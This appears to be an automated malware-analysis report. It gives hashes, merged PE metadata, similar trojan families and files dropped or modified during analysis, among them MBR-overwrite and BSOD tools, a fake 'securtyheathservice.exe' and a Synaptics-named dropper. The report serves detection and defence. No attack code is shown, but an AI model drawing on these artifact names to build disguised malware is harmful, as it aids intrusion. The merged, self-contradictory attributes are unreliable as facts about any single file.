SHA256: 415F38A25B7E9D98622D3D020225ED7F4B2016011D80219F6472308D184CD1F2

Tamanho do Arquivo: 158.72 KB, 158720 bytes

MD5: ec8748e4f85dca9f11e1c6ecca6757c8

SHA1: b3bafe977a0a2200344c85be3b8a1009dbe9558e

SHA256: 54B52FC863A3292187C324C2C177B920F5179FF5B157129206052BD60C9DD642

Tamanho do Arquivo: 133.63 KB, 133632 bytes

MD5: 1dda5693038f317113b316dfb51fbae4

SHA1: 5cc56de442f5d48ac8cbf3c0bafb14f6557aca2f

SHA256: C0B56F003CEBF35173FE33F9AC0133299872A8AC2263A05183585C5B6DB1E6C0

Tamanho do Arquivo: 273.12 KB, 273123 bytes

MD5: 9533cbe462e84646be585a059ddb4a35

SHA1: b3f2b779bc3a917e97844752e5fa9bd8fa80713a

SHA256: 8553111F308360CE28BEAE4A256D38CF3125B335370E395178652023EA9F4031

Tamanho do Arquivo: 164.86 KB, 164864 bytes

MD5: 4ddc786f9d5f716792466b17c8031f35

SHA1: ec4b16435ea374dee78466a5e1f493ecb1a92fc4

SHA256: 3E4A39685D64F617A2E6E3DA461BAE9444FF24D0513E03882AC18AE56976ADC6

Tamanho do Arquivo: 780.96 KB, 780958 bytes

MD5: 9f2dd93d4d708c5fd4d531e82333a229

SHA1: f9ef341ca067ce5065a5e5d5faa7f4136ed58879

SHA256: C30FCAF96D38F180A7E5BD5BFCF4B03783954C8BD2D3E9F763980633D4B8A2BA

Tamanho do Arquivo: 93.70 KB, 93696 bytes

MD5: 5966a9d20766639461eff970723c99f9

SHA1: 532580f543542e4dd83c728ca9ce7a8952c251b4

SHA256: 939A17CDCBEE2A50C36623E0519B1999399D29E27401BC9E01003952DD75D7BD

Tamanho do Arquivo: 114.18 KB, 114176 bytes

MD5: 1e087c19ebe70aa30fc3ce8e8ca394b5

SHA1: 8bb328ab66f390bbadbee79ce513e462c283995e

SHA256: 97700B1CD07B564096CFB692E9F4F143D694893D19E97A9B587748D17505BCB2

Tamanho do Arquivo: 461.82 KB, 461824 bytes

MD5: 4c6fc5c4245f4e92d8967bf36483fb3b

SHA1: 5bda5c53346463c23f4fb1f4b0b8a315031b738b

SHA256: EAAE1141D7C2C2FB69C400B7656D309AB0F19AE604E3447B4A26A088105153DD

Tamanho do Arquivo: 780.96 KB, 780958 bytes

MD5: c94a64363b1336d57920710c643ff65c

SHA1: c90acf6451160485ed9b644b930c9cab875879e2

SHA256: 7B92C2999099C404E5BDCF761C619C0C32F97ACE424DC48E6C4484AAAF49B0A1

Tamanho do Arquivo: 183.81 KB, 183808 bytes

MD5: 2e1bb4d5f4b9512987f861b458bb9f67

SHA1: e8ee784dbae92a849322ae4bbbfbe80b8e6d46e8

SHA256: 4528569330CF25A2DA50098837D2F41928220D3E4527319C8DB47032D342D279

Tamanho do Arquivo: 55.81 KB, 55808 bytes

MD5: 937bd5a2f717643646672ce2fa787805

SHA1: 67b6cf3ad05eccef6c01c12145a24daf5f37c5d0

SHA256: E1094947CF6B89DAA3F647903AD604BDDD47BE5D2F516E4730B19F2042E00AF9

Tamanho do Arquivo: 119.81 KB, 119808 bytes

MD5: bcc0367a3c8a8fbd83e76e915ab62524

SHA1: 75b386af7a942bf4de699d2ce18ee77dbed15781

SHA256: 21BDC5A9BA0C1CCE398430F0E86BE232E10FB1C1AA5ACB40C4CD93C775A45AE5

Tamanho do Arquivo: 780.96 KB, 780958 bytes

MD5: 23a76e922d527568eaa3865c8db6a310

SHA1: c5dc7ff21a84391e6137d41d52e9dda63a86f2f1

SHA256: A5F03EE0FD1D94D93445D87EAC07E2698774BD92DB16D718996AA771E7C9F0BD

Tamanho do Arquivo: 100.86 KB, 100864 bytes

MD5: 5afc5ff282698c1eef250f01df4ab448

SHA1: 331594903c605dddcd681ff5a0dae685810722f3

SHA256: ADD5BD7BA7E84471F635F10033A8B27FBF59547BBA92838610D3A96E30587349

Tamanho do Arquivo: 167.94 KB, 167936 bytes

MD5: 6fa92f52386273c6ece9de972aa19a72

SHA1: 21c7e2d9b705788770a94e65a94a424109511470

SHA256: B60B126D8E076E1528A3AE715D99CD313CAAE17767384A4D137549AD1BC8F58D

Tamanho do Arquivo: 3.10 MB, 3104768 bytes

MD5: 19e95a33308a154c9d512dd95244d13d

SHA1: 664173c68c99cd68bf668905fb36982705e28c67

SHA256: C84790EDD740B075327034329F66CEB03C2AE06825AE800674010B3E5A063BC2

Tamanho do Arquivo: 91.14 KB, 91136 bytes

MD5: 07749e7879c6945588e2aa1953a69115

SHA1: a78760b07d2e9fd9f50b2bbfe15c3b79322257b4

SHA256: 555E7438C7DC0F020A5F59E3834368FDCAA7C96D8613C53033AB1E62A79F1E46

Tamanho do Arquivo: 94.72 KB, 94720 bytes

MD5: 0bffc8e0fbbdc6eaea9c727871c96737

SHA1: b6ca22e4d2feb7b05d028a3eda357ddb9361a38a

SHA256: 2A250DB3B70A0187FB8C6B577D8E6331F0B257CCA296D48126032582104EA5AC

Tamanho do Arquivo: 112.13 KB, 112128 bytes

MD5: 0c9faec89d8b6772e9398c95f660d439

SHA1: 8273aa3c67b8d5b9ae35c413f9bf956ad2dc5a11

SHA256: 30E62256A1E0C3B1191DD9EB02F230E8EC5D9E5916254B4F586DFAE6C57181E3

Tamanho do Arquivo: 91.14 KB, 91136 bytes

MD5: 9e4d293518da08cfb2f592eb4ffea4ab

SHA1: ef7169b96011dd30ab4d30b93ad75e7c9e69f29a

SHA256: 7AA9F9C28CE8AA1C4A851591874ABF476DDF7386280D9DD0367C10BA54079261

Tamanho do Arquivo: 91.14 KB, 91136 bytes

MD5: 4c6af11bda268203863158f9963faa59

SHA1: d89caf218886708378f0ae011c2af09d55d1e8d3

SHA256: 512A560476B2B53B175BE7AC60F614F994DF02FA17E0C2305F53318031EBD347

Tamanho do Arquivo: 2.86 MB, 2863104 bytes

MD5: bd3b017d8ccb6f5da90244d0b7279cd6

SHA1: 23a8aab8a33e747a111d54e79e7043b7982591a6

SHA256: 3104FDD03B63706549939CB8D43610DC6216108CA570215E06E4AF74C92179BA

Tamanho do Arquivo: 135.68 KB, 135680 bytes

MD5: cd20ba87260a5812615d8ae0c418319f

SHA1: dde8344b11b5a0440b27a7efd11c76c7df8d28ad

SHA256: 7EB4C96877C2D80571AE8D0F97DE01F469D2A65A217FDC1A4ABF0A4C5A30BC33

Tamanho do Arquivo: 166.91 KB, 166912 bytes

Windows Portable Executable Attributes

File doesn't have "Rich" header
File doesn't have debug information
File doesn't have exports table
File doesn't have relocations information
File doesn't have security information
File has been packed
File has exports table
File has TLS information
File is .NET application
File is 32-bit executable

File is 64-bit executable
File is console application (IMAGE_SUBSYSTEM_WINDOWS_CUI)
File is either console or GUI application
File is GUI application (IMAGE_SUBSYSTEM_WINDOWS_GUI)
File is Native application (NOT .NET application)
File is not packed
IMAGE_FILE_DLL is not set inside PE header (Executable)
IMAGE_FILE_EXECUTABLE_IMAGE is set inside PE header (Executable Image)

File Icons

151 additional icons are not displayed above.

Windows PE Version Information

Nome	Valor
Assembly Version	1.0.0.0
Builder	Admin 12:55:57 10/11/2024
Comments	BASK1NG Fix made by Lineage2Ertheia mtkclient-gui MTK ROM Porter by Noah Domingues prolaz.su R6 Downloader The ultimate all-in-one utility for your Unowhy device ! This installation was built with Inno Setup.
Company Name	ALKERPRIVATE Asyneo BASK1NG BinHex Solutions Bloxyblocks CryptoNick Soft CryptoNick Soft™ dixen18 DV64 Evert-Jan Show More GAVI GAMES GPBOXPC GRAPHICX H-Regedit Hermon.sup.shop HorrorTrojans https://gpbox.com.br/ Lineage2Ertheia.com Microsoft Microsoft Corporation Mojang studios mtkclient-gui MTK ROM Porter by Noah Domingues O&O Software GmbH Oneplus_EDL_Tool R6 Downloader STY Inc. (STY1001) Synaptics Villa Software GmbH
Created	7z SFX Constructor v4.6.0.0 (http://usbtor.ru/viewtopic.php?t=798)
Email	CryptoNickSoft@gmail.com
File Description	@gpboxoficial BASK1NG Comprehensive toolkit for system optimization, maintenance, and diagnostics. Diego Z Fixes dpi auto settings for Lineage2Ertheia if dpi higher then 100 GFX Tool By GRAPHICX ! Half-Life Alyx Setup Launcher for minecraft MallMuzik VDJ Midi 2 Speech Setup Mercury Trojan variant C Show More mtkclient-gui MTK ROM Porter by Noah Domingues O&O BlueCon UserManager Oneplus_EDL_Tool R6 Downloader Start AlterID Synaptics Pointing Device Driver Unowhy Tools Win32 Cabinet Self-Extractor Windows Login Unlocker Распаковщик\упаковщик прошивок и образов разделов Самоизвлечение CAB-файлов Win32 一键重启至BIOS。图标作者：Good Ware
File Version	V1.0 v1 mtkclient-gui BASK1NG 25.2.10.0 11.00.17763.1 (WinBuild.160101.0800) 7.1.2020.0 4.3.0.3107 3.6.6.6 3.2.3 Show More 3.0 2.6 2.3.0.6404 2.0.0.7 2.0.0.0 2.0 1.7.10 1.7 1.3.0.5 1.3.0.1 1.1 1.00 1.0.1.5713 1.0.0.4 1.0.0.0 1.0
Internal Name	BASK1NG death DPI Fix for Lineage2Ertheia MIK.exe Minecraft mtkclient-gui newID Nitro-Codename-Explorer Oneplus_EDL_Tool OOUsrMgr.exe Show More R6 Downloader System Optimizer Toolkit TJprojMain Unowhy Tools.dll Wextract Win WLU_x86.exe www.vrmoo.net
Legal Copyright	2022 @gpboxoficial BASK1NG by Alker Copyright 2018-2024 © CryptoNickSoft™ Copyright O&O Software GmbH CryptoNickSoft@gmail.com DV64 Evert-Jan GRAPHICX Show More H-Regedit https://gpbox.com.br/ Lineage2Ertheia.com MOJANG mtkclient-gui Noah Domingues R6 Downloader STY1001 uranusproyect.blogspot.com © Microsoft Corporation. All rights reserved. © Villa Software GmbH © Корпорация Майкрософт. Все права защищены. Жека
Legal Trademarks	BASK1NG DV64 Lineage2Ertheia mtkclient-gui ProLAZ R6 Downloader
O L E Self Register	no
Original Filename	1.3 BASK1NG DPI FIX G47HHJ MIK.exe Minecraft mtkclient-gui MTK ROM Porter.exe newID Oneplus_EDL_Tool Show More OOUsrMgr.exe R6 Downloader Starter.exe Staruml System Optimizer Toolkit TJprojMain.exe Unowhy Tools.dll WEXTRACT.EXE .MUI Win.exe WLU_x86.exe
Private Build	2.0 BASK1NG FKI_ mtkclient-gui R6 Downloader
Product Name	AAMIR BUNERI BASK1NG Call of Duty Modern Warfare Crack Staruml Discord Nitro Generator DPI Fix for Lineage2Ertheia GAVI PATCH GestionImpression GFX Tool By GRAPHICX GPBOXPC Show More Half-Life Alyx Hauptwerk realtime starten Hermon.sup.shop Internet Explorer Launcher MallMuzik VDJ Midi 2 Speech MercuryRemastered mtkclient-gui MTK ROM Porter Multi Image Kitchen newID O&O BlueCon Oneplus_EDL_Tool Ping Optimizer Project1 R6 Downloader Starter Synaptics Pointing Device Driver System Optimizer Toolkit V3.0 Unowhy Tools VideoPad Eng Update VR魔趣网站 Win Windows Login Unlocker
Product Version	www.vrmoo.net mtkclient-gui BASK1NG 210812 18.0.8028 11.00.17763.1 7.1.2020.0 4.3.0.3107 3.6.6.6 3.2.3 Show More 3.0 2.7 2.6 2.3.0.6404 2.0.0.0 2.0 1.7.10 1.7 1.1 1.00 1.0.0.0 1.0.0+142230173ffee019186d053554a8ef7093a50cff 1.0.0+9c796a230a016f6219ecf3f148cb3c2823e33097
Special Build	2.0 BASK1NG FKI_ mtkclient-gui R6 Downloader

File Traits

2+ executable sections
dll
HighEntropy
No Version Info
packed
PECompact v2.20
x86

Block Information

Total Blocks:	265
Potentially Malicious Blocks:	30
Whitelisted Blocks:	235
Unknown Blocks:	0

Visual Map

x 0 0 x 0 x 0 x 0 x 0 x 0 x x x 0 x 0 x 0 x 0 x x 0 x x 0 x 0 x 0 x x x 0 x x 0 x x x 0 x x x x 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0

0 - Probable Safe Block
? - Unknown Block
x - Potentially Malicious Block

Similar Families

Bat2Exe.A
FakeAlert.X
HackKMS.DD
Kasperagent.A
Trojan.Agent.Gen.QT

Trojan.Downloader.Gen.HP

Files Modified

File	Attributes
\device\namedpipe	Generic Read,Write Attributes
\device\namedpipe	Generic Write,Read Attributes
\device\namedpipe\gmdasllogger	Generic Write,Read Attributes
c:	Read Attributes,Synchronize,Write Attributes
c:\2433.tmp\2434.tmp\2435.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\2bbb.tmp\2bbc.tmp\2bbd.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\3e32.tmp\3e33.tmp\3e34.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\4027.tmp\4028.tmp\4039.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\41a8.tmp\41a9.tmp\41ba.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\41f6.tmp\41f7.tmp\4208.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data

c:\4216.tmp	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\4216.tmp	Generic Write,Read Attributes
c:\4216.tmp\4217.tmp\4218.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\4216.tmp\oppo_edl_crack_v2.py	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\42e1.tmp\42e2.tmp\42e3.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\431f.tmp\4330.tmp\4331.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\4458.tmp\4468.tmp\4469.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\44a6.tmp\44a7.tmp\44b8.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\44e1.tmp\44e2.tmp\44e3.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\4552.tmp\4553.tmp\4554.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\4561.tmp	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\4561.tmp	Generic Write,Read Attributes
c:\4561.tmp\4562.tmp\4563.vbs	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\4561.tmp\bsod.cpp	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\4561.tmp\bsod.exe	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\4561.tmp\bytebeat.cpp	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\4561.tmp\bytebeat.exe	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\4561.tmp\bytebeat.txt	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\4561.tmp\bytebeat.wav	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\4561.tmp\colora.cpp	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\4561.tmp\colora.exe	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\4561.tmp\glitchb.cpp	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\4561.tmp\glitchb.exe	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\4561.tmp\mbr.cpp	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\4561.tmp\mbr.exe	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\4561.tmp\screenshuffle.cpp	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\4561.tmp\screenshuffle.exe	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\4561.tmp\t.vbs	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\4561.tmp\zoomlines.cpp	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\4561.tmp\zoomlines.exe	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\473f.tmp\4740.tmp\4741.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\4988.tmp\4999.tmp\499a.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\4a12.tmp\4a13.tmp\4a24.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\4ad5.tmp\4ad6.tmp\4ae6.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\4b7f.tmp\4b80.tmp\4b81.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\4c18.tmp	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\4c18.tmp	Generic Write,Read Attributes
c:\4c18.tmp\4c19.tmp\4c1a.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\4c18.tmp\securtyheathservice.exe	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\4ca5.tmp\4cb5.tmp\4cb6.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\4cb3.tmp\4cb4.tmp\4cb5.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\5109.tmp\510a.tmp\511a.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\52b4.tmp\52b5.tmp\52b6.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\52d4.tmp\52e4.tmp\52e5.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\5499.tmp\54a9.tmp\54aa.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\5506.tmp\5526.tmp\5527.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\55a2.tmp\55b3.tmp\55b4.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\55d1.tmp\55d2.tmp\55d3.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\5804.tmp\5814.tmp\5815.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\584d.tmp\584e.tmp\584f.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\5852.tmp\5863.tmp\5864.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\59bc.tmp\59bd.tmp\59be.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\5a27.tmp\5a37.tmp\5a58.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\5af2.tmp\5b51.tmp\5b61.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\5f38.tmp\5f39.tmp\5f49.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\6105.tmp\6106.tmp\6107.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\627.tmp	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\627.tmp	Generic Write,Read Attributes
c:\627.tmp	Synchronize,Write Attributes
c:\627.tmp\628.tmp\629.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\627.tmp\esptool.exe	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\627.tmp\esptool.exe	Synchronize,Write Attributes
c:\627.tmp\wifixv1.3.bin	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\627.tmp\wifixv1.3.bin	Synchronize,Write Attributes
c:\6722.tmp\6723.tmp\6724.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\67c3.tmp\67c4.tmp\67c5.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\68a9.tmp\68aa.tmp\68ba.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\6e89.tmp\6e8a.tmp\6e8b.vbs	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\6f52.tmp\6f53.tmp\6f54.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\7446.tmp\7456.tmp\7457.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\7bce.tmp\7bcf.tmp\7bd0.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\80a7.tmp\80a8.tmp\80a9.vbs	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\86e6.tmp\86e7.tmp\86f8.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\8f10.tmp\8f11.tmp\8f12.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\97ab.tmp\97ac.tmp\97ad.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\99a4.tmp\99a5.tmp\99b6.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\9b65.tmp\9b76.tmp\9b77.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\a2c3.tmp\a2c4.tmp\a2c5.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\a64d.tmp\a64e.tmp\a64f.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\a67c.tmp\a68c.tmp\a68d.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\a68b.tmp\a68c.tmp\a68d.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\a6ab.tmp\a6ac.tmp\a6ad.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\a6ab.tmp\a6ac.tmp\a6bc.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\a6ca.tmp\a6cb.tmp\a6cc.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\a708.tmp\a719.tmp\a71a.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\a72.tmp\a82.tmp\a83.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\a7f3.tmp\a7f4.tmp\a7f5.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\a831.tmp\a832.tmp\a833.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\aa.tmp\ab.tmp\ac.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\b11a.tmp\b12a.tmp\b12b.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\b14d.tmp\b15d.tmp\b15e.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\b253.tmp\b264.tmp\b265.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\b701.tmp\b711.tmp\b712.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\b81a.tmp\b81b.tmp\b82b.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\b90e.tmp\b90f.tmp\b910.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\ba28.tmp\ba38.tmp\ba39.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\bb94.tmp\bb95.tmp\bb96.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\bbb4.tmp\bbb5.tmp\bbb6.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\bbb4.tmp\bbc4.tmp\bbc5.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\bbd3.tmp\bbd4.tmp\bbd5.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\bc11.tmp\bc12.tmp\bc13.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\bef0.tmp\bf00.tmp\bf01.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\bfd2.tmp\bfd3.tmp\bfd4.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\bfe2.tmp\bfe3.tmp\bff3.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\c028.tmp\c029.tmp\c02a.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\c102.tmp\c103.tmp\c104.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\c1af.tmp\c1b0.tmp\c1b1.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\c1df.tmp\c1f0.tmp\c1f1.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\c327.tmp\c328.tmp\c329.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\c7e7.tmp\c7e8.tmp\c7e9.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\c9e3.tmp\c9e4.tmp\c9e5.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\cdc5.tmp\cdc6.tmp\cdc7.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\ce84.tmp\ce94.tmp\ce95.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\d0f3.tmp\d104.tmp\d105.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\d937.tmp\d938.tmp\d939.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\db10.tmp\db21.tmp\db22.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\db9c.tmp\db9d.tmp\db9e.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\df44.tmp\df45.tmp\df55.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\e447.tmp\e448.tmp\e449.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\e834.tmp\e835.tmp\e836.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\ea7.tmp\eb8.tmp\eb9.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\eaed.tmp\eaee.tmp\eaef.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\ec4b.tmp\ec4c.tmp\ec5d.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\efdb.tmp\efdc.tmp\efed.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\f431.tmp\f432.tmp\f442.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\f52d.tmp\f53e.tmp\f53f.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\ff4.tmp\ff5.tmp\ff6.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\programdata\synaptics	Synchronize,Write Attributes
c:\programdata\synaptics\rcxa63d.tmp	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\programdata\synaptics\synaptics.exe	Generic Read,Write Data,Write Attributes,Write extended,Append data,Delete,LEFT 262144
c:\programdata\synaptics\synaptics.exe	Synchronize,Write Attributes
c:\programdata\synaptics\synaptics.exe	Synchronize,Write Data
c:\soft\forxp\offreg_x86.dll	Generic Write,Read Attributes
c:\soft\forxp\offreg_x86.dll	Synchronize,Write Attributes
c:\soft\forxp\wlu_x86.exe	Generic Write,Read Attributes
c:\soft\forxp\wlu_x86.exe	Synchronize,Write Attributes
c:\soft\forxp\wlu_x86.ini	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\soft\forxp\wlu_x86.ini	Generic Write,Read Attributes
c:\soft\forxp\wlu_x86.ini	Synchronize,Write Attributes
c:\tbirdbridge\error.log	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\tbirdbridge\error.log	Generic Write,Read Attributes
c:\users\user\appdata\local\microsoft\internet explorer\ie4uinit-show.log	Generic Write,Read Attributes
c:\users\user\appdata\local\microsoft\internet explorer\iecompatdata\iecompatdata.xml	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\2k10\oousermanager\oobusrs.dll	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\2k10\oousermanager\oobusrs.dll	Synchronize,Write Attributes
c:\users\user\appdata\local\temp\2k10\oousermanager\oostarting.exe	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\2k10\oousermanager\oostarting.exe	Synchronize,Write Attributes
c:\users\user\appdata\local\temp\2k10\oousermanager\oousrmgr.exe	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\2k10\oousermanager\oousrmgr.exe	Synchronize,Write Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_hfwmd3fb.b3a.ps1	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_i330qyxv.qud.psm1	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_jld2a2s0.1el.psm1	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_kafifiyp.gsu.ps1	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_mridb1el.21n.psm1	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_qnzml4ty.pwp.ps1	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_sz0fhfrn.ndy.psm1	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_w23tuwz0.jy0.ps1	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_x1scgevo.x4n.psm1	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_z1urhprw.c3c.ps1	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\getadmin.vbs	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\temp\getadmin.vbs	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\is-j0emq.tmp\652f6c89bf9170d41d6213b77a493c24ca74e2a8_0005770421.tmp	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\is-kee6a.tmp\195803d634a77ee79cb2f0e9e2745857d0d69ac6_0002302632.tmp	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\is-naodm.tmp\_isetup\_setup64.tmp	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\temp\is-naodm.tmp\_isetup\_shfoldr.dll	Generic Read,Write Data,Write Attributes,Write extended,Append data
